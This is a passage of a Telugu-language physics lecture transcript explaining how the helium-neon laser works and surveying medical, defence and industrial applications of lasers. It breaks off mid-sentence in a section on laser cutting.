అరేంజ్మెంట్ అనేది వాడి తీరాలి. సో ఈ డ్రాబ్యాక్స్ అన్నీ మనకి కొంతవరకు హీలియం నియాన్ లేజర్లో ఎలిమినేట్ అవుతాయి. సో హీలియం నియాన్ లేజర్ ఇందులో వాడేది గ్యాస్ సబ్స్టెన్సెస్ కనుక ఇది గ్యాస్ లేజరు. నెక్స్ట్ ఇందులో అవుట్పుట్ కంటిన్యూస్ వేవ్ రూపంలో వస్తుంది కాబట్టి ఇది కంటిన్యూస్ లేజరు. నెక్స్ట్ వన్, ఇందులో ఎలక్ట్రికల్ డిశ్చార్జ్ పంపింగ్ మెకానిజం వాడడం జరుగుతుంది. నెక్స్ట్ ఇందులో 4 లెవెల్స్ మధ్య మనకి ఎనర్జీ ట్రాన్సిషన్స్ అనేవి ఉంటాయి కాబట్టి మనకి ఇది 4 లెవెల్ లేజరు. అండ్ ద లాస్ట్ వన్, ఇందులో కూడా అవుట్పుట్ విజిబుల్ రీజియన్లో ఉంటుంది. సో ఇక్కడ ఈ హీలియం నియాన్ లేజర్ని ఫస్ట్ తయారు చేసింది జవాన్, బెన్నెట్ అండ్ డి హీరియట్. వీళ్ళు 1961లో దీన్ని రూపొందించారు. ఇందులో ఏముంటుంది? ఇందులో ఒక క్వార్ట్జ్డ్ ట్యూబ్ ఉంటుంది. ఈ క్వార్ట్జ్డ్ ట్యూబ్ యొక్క లెంత్ 80 సెంటీమీటర్స్ ఉంటే డయామీటర్ 1.5 సెంటీమీటర్స్ ఉంటుంది. ఇటువంటి క్వార్ట్జ్ ట్యూబ్లో మనకి 2 గ్యాసెస్ అనేవి మిక్స్చర్ రూపంలో ఉంటాయి. ఒకటి హీలియము అండ్ ద అదర్ వన్ ఈజ్ నియాన్. ఈ నియాన్ హీలియం యొక్క రేషియో ఎంత ఉంటుంది? 1:10 రూపంలో ఉంటుంది. అదేవిధంగా ఈ 2 గ్యాసెస్ కూడా 2 డిఫరెంట్ ప్రెషర్స్ వద్ద ఉంటాయి. అందులో హీలియం ప్రెషరు 1 mm ఆఫ్ మెర్క్యూరీ అయితే నియాన్ ప్రెషరు 0.1 mm ఆఫ్ మెర్క్యూరీ. నెక్స్ట్ ఈ క్వార్ట్జ్ ట్యూబ్కి ఒక ఎండ్ పర్ఫెక్ట్ రిఫ్లెక్టర్ ఉంటుంది, ఇంకొక ఎండ్ పార్షియల్ రిఫ్లెక్టర్ ఉంటుంది. సో దిస్ ఈజ్ వన్ రిఫ్లెక్టర్ అండ్ ద అదర్ వన్ ఈజ్ రిఫ్లెక్టర్ ఈజ్ దిస్. ఇందులో రెడ్ కలర్లో మెజారిటీ ఛార్జ్ క్యారియర్స్ ఉన్నవి మనకి హీలియం ఆటమ్స్ అయితే గ్రీన్ కలర్లో ఉన్నవి నియాన్ ఆటమ్స్. ఇది క్వార్ట్జ్ ట్యూబ్. ఇందులో లెంత్ 80 సెంటీమీటర్స్, డయామీటర్ 1.5 సెంటీమీటర్స్. నెక్స్ట్ ఎగ్జైటేషన్ అనేది ఇందులో జరిగే ప్రాసెస్ ఏంటంటే ఎలక్ట్రికల్ డిశ్చార్జ్. ఈ ఎలక్ట్రికల్ డిశ్చార్జ్ అనేది హై ఫ్రీక్వెన్సీ జనరేటర్ నుంచి వస్తున్న ఎలక్ట్రికల్ సిగ్నల్స్ రూపంలో ఎలక్ట్రికల్ డిశ్చార్జ్ జరిగి ఈ హీలియం ఆటమ్స్ కానీ నియాన్ ఆటమ్స్ కానీ ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్ళడం జరుగుతుంది. హౌ దిస్ లేజర్ లైట్ వర్క్స్? ఇందులో వర్కింగ్ ఫినామినన్ ఎలా ఉంది? ఈ ఎలక్ట్రికల్ డిశ్చార్జ్ వల్ల ఫస్ట్ ఆఫ్ ఆల్ హీలియం ఆటమ్స్ ఎనర్జీని అబ్జర్వ్ చేసుకుని హైయర్ ఎనర్జీ స్టేట్స్ E3, E5లోకి ఈ హీలియం ఆటమ్స్ వెళ్ళడం జరుగుతుంది. ఈ రెండు కూడా E3, E5 స్టేట్స్ హీలియం ఆటమ్స్కి మెటాస్టేబుల్ స్టేట్స్ కాబట్టి అక్కడికి వెళ్ళిన ఎలక్ట్రాన్స్ ఎక్కువ టైం స్పెండ్ చేస్తాయి, అంటే వాటంతట అవి కిందికి రావు. కనుక హీలియం ఆటమ్స్ యొక్క పాపులేషన్ ఇన్వర్షన్ అనేది E3, E5 స్టేట్స్లో అచీవ్ అవ్వడం జరుగుతుంది. E3, E5 స్టేట్స్లో ఉన్న హీలియం ఆటమ్స్ గ్రౌండ్ స్టేట్లో ఉన్న ఈ నియాన్ ఆటమ్స్తో కొలిషన్ జరుపుతాయి. కొలిషన్ జరిపినప్పుడు ఈ కొలిషన్ ప్రాసెస్లో హీలియం ఆటమ్స్ కొంత ఎనర్జీని ఈ నియాన్ ఆటమ్స్కి ట్రాన్స్ఫర్ చేస్తాయి. నియాన్ ఆటమ్స్కి ట్రాన్స్ఫర్ చేసిన ఈ ఎనర్జీని నియాన్ ఆటమ్స్ అబ్జార్బ్ చేసుకుని ఇవి ఎగ్జైటెడ్ స్టేట్స్కి వెళ్తాయి. అదేవిధంగా హీలియం ఆటమ్స్ ఎనర్జీని లాస్ అయిపోవడం వల్ల అవి మళ్ళీ తిరిగి గ్రౌండ్ స్టేట్కి రావడం జరుగుతుంది. సో అది ఈ ఫిగర్లో మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో నియాన్ ఆటమ్స్ అనేవి ఎగ్జైటెడ్ స్టేట్లో ఉన్న హీలియం ఆటమ్స్తో కొలిషన్స్ జరపడం వల్ల అవి E3, E4, E5 ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్తాయి. కానీ అదే సమయంలో హీలియం ఆటమ్స్ ఎగ్జైటెడ్ స్టేట్స్లో ఉన్న హీలియం ఆటమ్స్ తిరిగి E1 అనే గ్రౌండ్ స్టేట్కి రావడం జరుగుతుంది.
ఇందులో హీలియం యాటమ్స్కి E4 E5 రెండు కూడా మెటాస్టేబుల్ స్టేట్స్, సారీ నియాన్ యాటమ్స్కి E4 E5 ఈ రెండు స్టేట్స్ కూడా మెటాస్టేబుల్ స్టేట్స్. అంటే అక్కడికి వెళ్ళిన నియాన్ యాటమ్స్ వాటంతట అవి తిరిగి కిందికి రాలేవు. సో ఆ విధంగా మనకి ఈ మెటాస్టేబుల్ స్టేట్స్లో నియాన్ యాటమ్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా ఇంక్రీజ్ అవుతుంది. గ్రాడ్యువల్గా ఇంక్రీజ్ అవ్వడం వల్ల ఈ రెండు స్టేట్స్లో నియాన్ యాటమ్స్ యొక్క పాపులేషన్ ఇన్వర్షన్ అనేది జరుగుతుంది. ఈ నియాన్ యాటమ్స్లో పాపులేషన్ ఎప్పుడైతే ఇన్వర్షన్ జరిగిందో అప్పుడు మనకి స్పాంటేనియస్ ఎమిషన్ జరగడానికి ఒక హై ప్రాబబిలిటీ ఉంటుంది. ఈ స్పాంటేనియస్ ఎమిషన్ వల్ల E4 నుంచి E3 కానీ లేదా E5 నుంచి E3 కానీ ఒక ఫోటాన్ అనేది ఎమిట్ అవ్వడం జరగవచ్చు. ఈ ఎమిటెడ్ ఫోటాన్ అనేది ఆ ట్యూబ్ యొక్క లెంత్ వెంబడి ట్రావెల్ చేస్తూ అటుపక్క ఇటుపక్క రిఫ్లెక్టర్స్ ఉండడం వల్ల ఆ రిఫ్లెక్టర్స్ వల్ల రిఫ్లెక్షన్స్కి అండర్గోన్ అవుతూ ఏదో ఒక సమయంలో ఇంకొక ఎగ్జైటెడ్ నియాన్ యాటమ్తో ఇవి కొలిషన్స్ జరుపుతాయి. ఎగ్జైటెడ్ నియాన్ యాటమ్తో ఎప్పుడైతే ఇవి కొలిషన్స్ జరిపాయో ఆ ఎగ్జైటెడ్ నియాన్ యాటమ్ని కిందికి గ్రౌండ్ స్టేట్కి పంపిస్తూ ఎనర్జీని ఫోటాన్ రూపంలో ఎమిట్ చేయడం జరుగుతుంది. సో ఈ విధంగా మనకి ప్రాసెస్ చైన్ రియాక్షన్ కంటిన్యూస్గా జరుగుతూ ఫైనల్గా మనకి అవుట్పుట్ లేజర్ లైట్ రూపంలో మనకి బయటకు వస్తుంది. ఈ బయటకు వస్తున్న లేజర్ లైట్ యొక్క వేవ్ లెంత్ 632.8 నానోమీటర్స్. సో ఇది కూడా మనకి విజిబుల్ రీజియన్లో ఉంది కాబట్టి <7,000 కాబట్టి ఇది కూడా విజిబుల్ రీజియన్లో ఉన్న లేజర్ లైట్. అయితే ఇందులో అప్లికేషన్స్ ఏంటంటే హీలియం నియాన్ లేజర్ యొక్క అప్లికేషన్స్. అందులో ఫస్ట్ వన్, ఇట్ ఈస్ ఆల్సో యూజ్డ్ ఫర్ ప్రొడక్షన్ ఆఫ్ హలోగ్రామ్స్. రెండోది యూజ్డ్ ఇన్ ల్యాబొరేటరీస్. మూడోది యూజ్డ్ ఇన్ ఆప్టికల్ కమ్యూనికేషన్ సిస్టమ్స్. అదేవిధంగా వీటి అడ్వాంటేజెస్ ఏంటి, ఇది కంటిన్యూస్ అవుట్పుట్ని ఇస్తుంది, అదేవిధంగా లెస్ ఎక్స్పెన్సివ్. లాస్ట్ వన్, దీనికి స్టెబిలిటీ చాలా ఎక్కువ. సార్ next we are going to discuss about applications of lasers. Lasers can be applied in various fields. అందులో ఫస్ట్ వన్ మెడిసిన్లోను, రెండోది కమ్యూనికేషన్స్లోను, మూడోది మనకి మిలిటరీ ఆర్ డిఫెన్స్ సెక్టర్లోను, నెక్స్ట్ వన్ ఇండస్ట్రియల్ సెక్టర్స్లోను, లాస్ట్ వన్ రీసెర్చ్లోను, అదేవిధంగా మనకి ఎంటర్టైన్మెంట్లో కూడా ఈ లేజర్స్ని ఉపయోగించవచ్చు. ఇందులో ఫస్ట్ మెడిసిన్లో ఎక్కడ వాడతారు? ఇన్ మెడిసిన్ లేజర్ రీసర్ఫేసింగ్ అనేది ఒక ప్రాసెస్ ఉంది. ఈ లేజర్ రీసర్ఫేసింగ్ ప్రాసెస్లో మన స్కిన్ మీద ఉన్న డ్యామేజ్డ్ సెల్స్ని ఈ లేజర్స్ ఉపయోగించి ఎలిమినేట్ చేయడం వల్ల ఆ ప్లేసెస్లో యంగర్ హెల్దియర్ సెల్స్ డెవలప్ అవుతాయి. ఇందులో మనం వాడేది CO2 లేజర్కి వాడతాం. ఈ CO2 లేజర్ ఏమవుతుందంటే మన స్కిన్ కింద ఉన్న కొలేజన్ని స్టిమ్యులేట్ చేయడం వల్ల మన స్కిన్ అనేది స్మూత్గా అవుతుంది. ఫర్ ఎగ్జాంపుల్ ఈ ఫిగర్లో కనుక మనం అబ్జర్వ్ చేస్తే ఇక్కడున్న ఈ డ్యామేజ్డ్ సెల్స్లో స్కిన్ మీద ఉన్న డ్యామేజ్డ్ సెల్స్ అన్నింటినీ ఈ ఫినామినన్ ద్వారా ఎలిమినేట్ చేయడం వల్ల ఆ స్కిన్ హెల్దీగాను యంగర్గాను కనబడుతుంది ఈ ఫిగర్లో. ఇది లేజర్ రీసర్ఫేసింగ్ ఫినామినన్. అదేవిధంగా రెండో దానికి వచ్చేసరికి బ్లూ లైట్ థెరపీ అనేది వాడడం జరుగుతుంది. ఈ బ్లూ లైట్ థెరపీలో ఏమవుతుంది, స్కిన్ మీద ఉన్న ఎన్లార్జ్డ్ పోర్స్, అదేవిధంగా పెర్సిస్టెంట్ యాక్నే అంటే ఏంటంటే మనకి అడాల్సెంట్ స్టేజ్లో మన ఫేస్ మీద రెడ్ కలర్ మచ్చలు వస్తుంటాయి. ఇది ఎందుకు వస్తున్నాయంటే మనకి గ్లాండ్స్లో ఓవర్ సెక్రేషన్ వల్ల ఈ రెడ్ కలర్ మచ్చలు అనేవి ఏర్పడడం జరుగుతుంది. వీటన్నిటిని కూడా మనం ఈ లేజర్స్ ఉపయోగించి తీయడం జరుగుతుంది. అందులో అదేవిధంగా స్కేర్స్, మనం ముఖంపై ఏర్పడిన వివిధ రకాల మచ్చలు, మనకి పుట్టు మచ్చలే ఉన్న వాటన్నిటిని కూడా మనం ఈ లేజర్స్ ఉపయోగించి ఎలిమినేట్ చేయొచ్చు. ఈ ఫిగర్లో మనకి ఇక్కడిక్కడ ఉన్న రెడ్ కలర్స్ ఈ యాక్నే మొత్తం కూడా మనకి లేజర్ ట్రీట్మెంట్ వల్ల, బ్లూ లైట్ థెరపీ ట్రీట్మెంట్ వల్ల మొత్తం ఫేస్ అంతా కూడా క్లీన్గా మారుతుంది. అండ్ ఇందులో వాడేవి ఎక్కువగా ఎఫర్మ్ లేజర్స్ వాడుతుంటాం ఫేషియల్ రీజనరేషన్కి. అదేవిధంగా మనం ఇంకొక ట్రీట్మెంట్ ఉంది ఏంటంటే TMR అంటే ట్రాన్స్ మైకార్డియల్ లేజర్ రీజనరేషన్. ఇదేం చేస్తుంది, మన హార్ట్లో ఉన్న ఆర్టరీస్ లేదా కరోనరీ ఆర్టరీస్లో బ్లడ్ బ్లాక్ అయితే ఈ బ్లడ్ బ్లాకేజ్ని మనం ఎలిమినేట్ చేస్తూ ఆ ఛానల్స్ని రీఓపెన్ చేయడానికి ఉపయోగపడుతుంది. ఇందులో వాడేది ఏంటంటే CO2 లేజర్ వాడతాం. ఈ CO2 లేజర్ ఏం చేస్తుందంటే హార్ట్లో ఉన్న స్మాల్ ఛానల్స్ని ఓపెన్ చేయడం వల్ల బ్లడ్ ఫ్లో అనేది హార్ట్లో ఫాస్ట్గా జరుగుతుంది. ఈ ప్రాసెస్లో మనం ఏం చేస్తామంటే లెఫ్ట్ చెస్ట్ ఇన్సిషన్ ద్వారా కానీ లేదా సెంటర్లో ఇన్సిషన్ ద్వారా కానీ ఆ
ఛానల్స్ను ఓపెన్ చేయడం జరుగుతుంది. ఇది ఎక్కువగా బైపాస్, కరోనరీ ఆర్టరీ సర్జరీతో ఈ ప్రాసెస్ అనేది మనం ఎక్కువగా చేయడం జరుగుతుంది. అదేవిధంగా థర్డ్ ట్రీట్మెంట్ ఏంటంటే నెక్స్ట్ ఫైబర్ ఆప్టిక్ లేజర్ క్యాటహెటర్. ఇది దేనికి ఉపయోగపడుతుంది? ట్రీట్మెంట్ ఆఫ్ బ్లీడింగ్ అల్సర్స్. అల్సర్స్లో ఉన్న బ్లీడింగ్ని ఎలిమినేట్ చేయడానికి ఇది ఉపయోగపడుతుంది. ఏదైనా ఒక అల్సరు కంటిన్యూస్గా బ్లీడ్ అవుతూ ఉంటే ఈ లేజర్ వల్ల ఆ అల్సర్ నుంచి వస్తున్న బ్లడ్ మొత్తం ఫోటోకాగులేట్ అవ్వడం వల్ల అక్కడ బ్లీడింగ్ అనేది స్టాప్ అవ్వడం జరుగుతుంది. నెక్స్ట్ ప్రాసెస్ ఏంటంటే లేజర్ ఎండోస్కోపీ. ఈ లేజర్ ఎండోస్కోపీ అనేది ట్యూమర్స్లో మనం డైరెక్ట్గా ట్రీట్ చేయడానికి ఉపయోగపడుతుంది. ఏదైతే ట్యూమర్ ప్లేస్ ఉందో అక్కడ ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ దాని మీద పడేసరికి ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ వల్ల ఆ ట్యూమర్లో ఉన్న సెల్స్ అన్నీ కూడా డెస్ట్రాయ్ అవుతుంది. ఈ హై ఇంటెన్సిటీ లేజర్ బీమ్ని ఒక కంప్యూటర్ కంట్రోల్డ్ ఎక్విప్మెంట్ ద్వారా మనం కంట్రోల్ చేయొచ్చు. నెక్స్ట్ అప్లికేషన్ ఏంటంటే లేజర్ గ్లేజింగ్. ఈ లేజర్ గ్లేజింగ్ ఏంటి? మన టీత్ మీద ఉన్న డికే మొత్తాన్ని కూడా చారింగ్ చేయడానికి ఉపయోగపడుతుంది. ఫర్ ఎగ్జాంపుల్ ఏదైనా మన టీత్ క్యావిటీస్లో ఏదైనా డ్యామేజ్డ్ పార్ట్ కానీ లేదా ఇన్ఫెక్షన్స్ కానీ ఏమైనా ఉంటే ఈ లేజర్ బీమ్, హై ఎనర్జీ లేజర్ బీము ఆ క్యావిటీస్లో ఉన్న ఈ డ్యామేజ్డ్ సెల్స్ని మొత్తం డెస్ట్రాయ్ చేసి ఆ టీత్ మొత్తాన్ని కూడా మనకి శుభ్రం చేయడానికి ఈ లేజర్ గ్లేజింగ్ ఫినామినన్ అనేది వాడతాం. నెక్స్ట్ డిఫెన్స్ సెక్టార్లో. ఈ డిఫెన్స్ సెక్టార్లో మనం ఎక్కడెక్కడ వాడతాం? ఫస్ట్ వన్ అనేది ఈ లేజర్ రేంజ్ ఫైండర్స్. ఈ లేజర్ రేంజ్ ఫైండర్స్ దేనికి ఉపయోగపడతాయి? ఎనిమీస్ కానీ ఎనిమీ ట్యాంక్స్ యొక్క పొజిషన్ని కానీ యాక్యురేట్గా మనం ఫైండ్ అవుట్ చేయడానికి ఉపయోగపడుతున్నాయి. ఇందులో వాడేది మనకి నియోడినం లేజర్స్ కానీ CO2 లేజర్స్ కానీ. ఈ లేజర్ రేంజ్ ఫైండర్స్ దేని మీద ఆధారపడుతూ పనిచేస్తాయి? ఇవి మనకి రాడార్ అప్లికేషన్స్ మీద లేదా రాడార్ ప్రిన్సిపల్ మీద ఆధారపడుతూ ఈ రేంజ్ ఫైండర్స్ అనేవి పనిచేస్తాయి. ఇందులో మళ్ళీ రెండు రకాలు ఉన్నాయి. ఒకటి ట్యాంక్ లేజర్ రేంజ్ ఫైండర్స్, రెండోది పోర్టబుల్ లేజర్ రేంజ్ ఫైండర్స్. ట్యాంక్ లేజర్ రేంజ్ ఫైండర్స్ ఎక్కడ వాడతామంటే మనకి ఆర్మర్డ్ వెహికల్స్లో కానీ ట్రక్స్లో కానీ ఆర్టిలరీలో కానీ వాడతాం. పోర్టబుల్ లేజర్ రేంజ్ ఫైండర్స్ ఆర్టిలరీలో ఉన్న ఫైర్ కంట్రోల్ సిస్టమ్స్లో వాడడం జరుగుతుంది. నెక్స్ట్ అండర్ వాటర్ లేజర్. ఈ లేజర్ని మనం అండర్ వాటర్ కమ్యూనికేషన్ కూడా వాడచ్చు. అయితే ఏ లేజర్స్ అయితే మనకి బ్లూ గ్రీన్ రీజియన్లో లేజర్ లైట్ని ఎమిట్ చేస్తున్నాయో అవి మాత్రమే మనం ఈ అండర్ వాటర్ కమ్యూనికేషన్కి వాడతాం. ఎందుకంటే బ్లూ గ్రీన్ రీజియన్ అనేది మోస్ట్ సూటబుల్ ట్రాన్స్మిషన్ ఇన్ సీ వాటర్. ఆ రీజియన్ మోస్ట్ సూటబుల్గా ఉంటుంది. నెక్స్ట్ ఆ అండర్ వాటర్ కమ్యూనికేషన్ అనేది ఎక్కువగా మనం నావీలో వాడతాం, నావీ సెక్టర్లో వాడుతుంటాం. ఇందులో వాడే లేజర్స్ NDYAG లేజరు, అదేవిధంగా ఆర్గాన్ అయాన్ లేజరు, గ్యాస్ లేజర్స్ కూడా వాడడం జరుగుతుంది. అయితే ఈ లేజర్స్ వల్ల ఉపయోగం ఏంటి? టార్పెడో కమ్యూనికేషన్ అనేది విత్ అబ్సల్యూట్ ప్రైవసీ, అంటే ఇంకొకరికి తెలియకుండా సబ్మెరీన్స్ మధ్య కమ్యూనికేషన్ అనేది మనం ఈజీగా చేయొచ్చు. అయితే వీటికి మనం ఎక్కువగా వాడేది, మనం ప్రజెంట్ డేస్లో వాడేది సోనార్. అయితే సోనార్ వల్ల కొన్ని లిమిటేషన్స్ ఉన్నాయి. ఏమవుతుందంటే సోనార్ వేవ్స్ అనేవి మనకి ఎప్పుడైతే అబ్స్ట్రక్షన్స్లో మనకి వేల్స్ కానీ డాల్ఫిన్స్ కానీ మెరైన్ లివింగ్ యానిమల్స్ కానీ ఏమైనా వస్తే ఫాల్ సిగ్నల్స్ వస్తాయి సోనార్ వేవ్స్ వల్ల. రెండోది ఈ సోనార్ వేవ్స్ అనేవి సీ వాటర్ వల్ల బ్రాడనింగ్కి, నెక్స్ట్ స్కాటరింగ్ ఫినామినన్కి లోనవుతాయి. నెక్స్ట్ ఈ సోనార్ వేవ్స్ ఎమిట్ చేస్తున్న సోర్స్ని మనం లేదా ఎనిమీస్ ఈజీగా ఫైండ్ అవుట్ చేయొచ్చు. అంటే ఇది ప్రైవసీ ఉండదు, సీక్రసీ ఉండదు. కానీ ఆ సోనార్ ప్లేస్లో మనం ఈ అండర్ వాటర్ కమ్యూనికేషన్కి లేజర్స్ వాడితే మన సీక్రసీ అనేది లేదా ప్రైవసీ అనేది ఈజీగా మెయింటైన్ అవుతుంది. అదేవిధంగా రీసెంట్గా ఈ అండర్ వాటర్ కమ్యూనికేషన్ అనేది వయా శాటిలైట్ జరుగుతుంది. అంటే గ్రౌండ్ స్టేట్ నుంచి శాటిలైట్కి వెళ్ళి సిగ్నల్స్, ఆ శాటిలైట్ నుంచి అండర్ వాటర్ స్టేషన్కి అనేది ఈ కమ్యూనికేషన్ అనేది సిగ్నల్స్ రూపంలో పంపించడం జరుగుతుంది. నెక్స్ట్ లేజర్ గైడెడ్ యాంటీ ట్యాంక్ మిసైల్. ఇందులో ఒక మిసైల్ అనేది మనకి ఒక ట్యాంక్ నుంచి వెలువడుతున్న మిసైల్ అనేది అది IR బీమ్ వల్ల కంట్రోల్ అవుతూ IR బీమ్ వల్ల గైడ్ అవుతుంది. అంటే ఆ మిసైల్లో ఒక లేజర్ సోర్స్ ఉంటుంది. ఈ లేజర్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైటు ఎదురుగా ఉన్న టార్గెట్ మీద ఇన్సిడెంట్ అయ్యి ఆ టార్గెట్ నుంచి వస్తున్న స్కాటర్డ్ రేడియేషన్ వల్ల ఈ మిసైల్ వైపు రావడం వల్ల ఆ మిసైల్లో ఉన్న ఫోటో డిటెక్టరు ఆ టార్గెట్ నుంచి వస్తున్న స్కాటర్డ్ రేడియేషన్ని ఫైండ్ అవుట్ చేస్తూ ఆ టార్గెట్ యొక్క పొజిషన్ ఎక్కడుందో అనేది ఖచ్చితంగా ఈ మిసైల్కి చెప్తూ ఆ మిసైల్ కరెక్ట్గా టార్గెట్ని రీచ్ అయ్యే విధంగా ఇది గైడ్ చేస్తూ ఉంటుంది. ఫర్ ఎగ్జాంపుల్ ఇక్కడ కానీ మనం క్లియర్గా అబ్జర్వ్ చేస్తే ఈ మిసైల్ IR రేడియేషన్ వల్ల గైడ్ అవుతూ కరెక్ట్గా టార్గెట్ని రీచ్ అవుతుంది. అయితే ఇందులో వాడేది NDYAG లేజర్ వాడతాం. అదేవిధంగా ఇందులో మనకి ట్యాంక్ అనేది ఈజీగా టార్గెట్ని లేదా ట్యాంక్ని కానీ ఈజీగా మనం రీచ్ అవ్వచ్చు. నెక్స్ట్ వన్ ఈజ్ లీడార్.
లీడార్ అంటే ఏంటి? లేజర్ని కనుక రాడార్ అప్లికేషన్స్ వాడితే దాన్ని మనం లీడార్ అంటున్నాం. ఇందులో కనుక అబ్జర్వ్ చేస్తే మనం ఈజీగా మనం డిస్టెన్సెస్ని యాక్యురేట్గా మరియు కరెక్ట్ వాల్యూస్ని మనం ఫైండ్ అవుట్ చేయొచ్చు. ఇందులో వాడే లేజర్స్ సిఓటి లేజరు, అదేవిధంగా గ్యాలియం ఆర్సెనైడ్ లేజర్ ఎక్కువగా వాడుతున్నాం. ఇందులో మెయిన్ డ్రాబ్యాక్ ఏంటంటే వెదర్ కండిషన్స్ గుడ్గా ఉండాలి. ఈ లీడార్ను వాడుతున్నప్పుడు వెదర్ కనుక కరెక్ట్గా లేకపోతే అందులో ఉన్న ఫాగ్ వల్ల కానీ, రెయిన్ వల్ల కానీ, లేదా స్నో వల్ల కానీ ఈ లేజర్ బీమ్ ఎటెన్యూట్ అవ్వడం వల్ల మనకి లీడార్ అనేది కంప్లీట్గా వర్క్ అవ్వదు. కనుక వెదర్ కండిషన్స్ గుడ్గా ఉంటేనే ఈ లీడార్ అనేది మనం వాడచ్చు. లేని పక్షంలో మనకి యాక్యురేట్ మెజర్మెంట్స్ రావు, మళ్ళీ మనం రాడార్ మీద మాత్రమే డిపెండ్ అవ్వాలి. నెక్స్ట్ లేజర్ గైరోస్కోప్. ఈ లేజర్ గైరోస్కోప్ దేనికి ఉపయోగపడుతుంది? ఈ లేజర్ గైరోస్కోప్ అనేది స్మాల్ రొటేషన్స్ని కానీ మెజర్ చేయడానికి కానీ లేదా వాటిని ఫైండ్ అవుట్ చేయడానికి కానీ ఈ లేజర్ గైరోస్కోప్ వాడబడుతుంది. ఈ లేజర్ గైరోస్కోప్లో ఉండే లేజర్స్ ఏంటి? ఇందులో ఎక్కువగా వాడేది మనం హీలియం నియాన్ లేజర్ వాడతాం. ఈ హీలియం నియాన్ లేజర్ అనేది వాడడం వల్ల మనకి అక్కడ రొటేషన్ బాడీ యొక్క రొటేషన్ ఫినామినన్ మీద ఆధారపడుతూ సాగ్నెస్ ఎఫెక్ట్ అనేది ఒకటి ఉంది. ఈ సాగ్నెస్ ఎఫెక్ట్ ఏం చెప్తుంది? ఈ సాగ్నెస్ ఎఫెక్ట్ వల్ల ఏమవుతుందంటే బాడీలో ఏమాత్రం రొటేషన్ వచ్చినా ఆ రొటేషను ఇంటర్ఫెరోమీటర్ టెక్నిక్ వల్ల మనం క్లియర్గా అబ్జర్వ్ చేయొచ్చు. సో ఆటోమేటిక్గా బాడీ యొక్క రొటేషన్ని కానీ ఎంత యాంగిల్ రొటేట్ అయిందని కానీ ఈ లేజర్ గైరోస్కోప్ ఇన్స్ట్రుమెంట్ ఉపయోగించి మెజర్ చేయొచ్చు. అయితే ఈ లేజర్ గైరోస్కోప్ ఇన్స్ట్రుమెంట్ ఎక్కడ వాడతాం? ఇది మనకి ఇనర్షియల్ గైడెన్స్ ఆఫ్ మిసైల్స్లో కానీ, ఎయిర్ క్రాఫ్ట్స్లో కానీ, షిప్స్లో కానీ, మనం ఫ్లైట్ కంట్రోల్ సిస్టమ్స్లో కానీ ఈ లేజర్ గైరోస్కోప్ అనేది వాడడం జరుగుతుంది. నెక్స్ట్ ఎయిర్ రీకొనెసెన్స్ అంటే ఏంటి? ఇప్పుడైతే మనం ఎనిమీ యొక్క ట్యాంక్స్ని కానీ నైట్ టైంలో సీక్రెట్గా ఫోటోగ్రఫీ తీయాలి అంటే మనం వాటిని లేజర్ లైట్స్ ఉపయోగించి తీయొచ్చు. ఇన్ ఓల్డెన్ డేస్లో మనం అక్కడ ఏం చేసేవాళ్ళం అంటే కెమెరాస్ పెట్టి పవర్ స్ట్రోబ్స్ లైటింగ్ ఫెసిలిటీ పెట్టి మనం అప్పుడు ఫొటోస్ తీసేవాళ్ళం. కానీ ఇప్పుడు లేజర్ లైట్ పెట్టడం వల్ల సీక్రెట్గా మనం బయట వాళ్ళకి తెలియకుండా ఒక ఫ్లైట్ వెళ్తున్నప్పుడు కిందనున్న మొత్తం పిక్చర్ అంతటిని కూడా మనం ఫొటోస్ రూపంలో హై రెజల్యూషన్లో మనం ఫోటోగ్రఫీస్ని అబ్జర్వ్ చేయొచ్చు. ఇందులో వాడేది హీలియం నియాన్ లేజరు, అదేవిధంగా గ్యాలియం ఆర్సెనైడ్ లేజర్. నెక్స్ట్ లేజర్ డ్రిల్లింగ్. ఇండస్ట్రీస్ పర్పసెస్లో ఫస్ట్ ప్రాసెస్ లేజర్ డ్రిల్లింగ్. ఈ లేజర్ డ్రిల్లింగ్ ఏం చేస్తుంది? ఇది ఫేస్ హీటింగ్ ఫినామినన్ మీద ఆధారపడుతూ వర్క్ అవుతుంది. ఇందులో ఒక సర్ఫేస్ మీద హై ఇంటెన్సిటీ లేజర్ బీమ్ పడడం వల్ల ఆ సర్ఫేస్ మొత్తం టెంపరేచర్ పెరగడం వల్ల అది మొత్తం కూడా మెల్ట్ అవుతుంది. మెల్ట్ కావడం వల్ల అక్కడున్న సర్ఫేస్ యొక్క మెటీరియల్ యొక్క టెంపరేచరు బాయిలింగ్ పాయింట్ టెంపరేచర్ కన్నా పెరిగినప్పుడు అది మొత్తం ఆ సర్ఫేస్లో మీద ఉన్న మెటీరియల్ మొత్తం కూడా వేపర్ స్టేట్లోకి మారుతుంది. యాజ్ ఎ రిజల్ట్ అక్కడ హోల్ ఏర్పడుతుంది. ఇందులో వాడే లేజర్స్ సిఓటి లేజర్ వాడతాం, అదేవిధంగా ఎన్డివైఏజీ లేజర్ వాడతాం. ఈ ఫినామినన్ మనం డైమండ్స్లో కానీ రుబీ క్రిస్టల్స్లో కానీ హోల్స్ని డ్రిల్ చేయడానికి వాడతాం. నెక్స్ట్ లేజర్ మైక్రో మెషినింగ్. ఈ లేజర్ మైక్రో మెషినింగ్ దేనికి ఉపయోగపడుతుంది? ఇది మైక్రోమీటర్ సైజ్ ఏరియాస్ని పక్కనున్న ఏరియాస్ ఏవి డ్యామేజ్ అవ్వకుండా హీట్ చేయడానికి ఉపయోగపడుతుంది. అదేవిధంగా టైనీ ఎలక్ట్రానిక్ సర్క్యూట్స్ అనేవి సెరమిక్ సబ్స్ట్రేట్స్ మీద ఫార్మ్ అవ్వడానికి కూడా ఈ మైక్రో మెషినింగ్ అనేది వాడడం జరుగుతుంది. నెక్స్ట్ లేజర్ కటింగ్. ఈ లేజర్ ఫర్ ఎగ్జాంపుల్ గ్రాఫైట్ కానీ, డైమండ్ కానీ, నెక్స్ట్ సెరమిక్ సబ్స్టెన్సెస్ కానీ, లేదా కార్బైడ్ కానీ, టంగ్స్టన్ కానీ కట్ చేయాలంటే మనం ఈ లేజర్ కటింగ్ ఫినామినన్ అనేది వాడుతున్నాం. ఇందులో అన్ని గ్యాసెస్ లేజర్స్ మనం 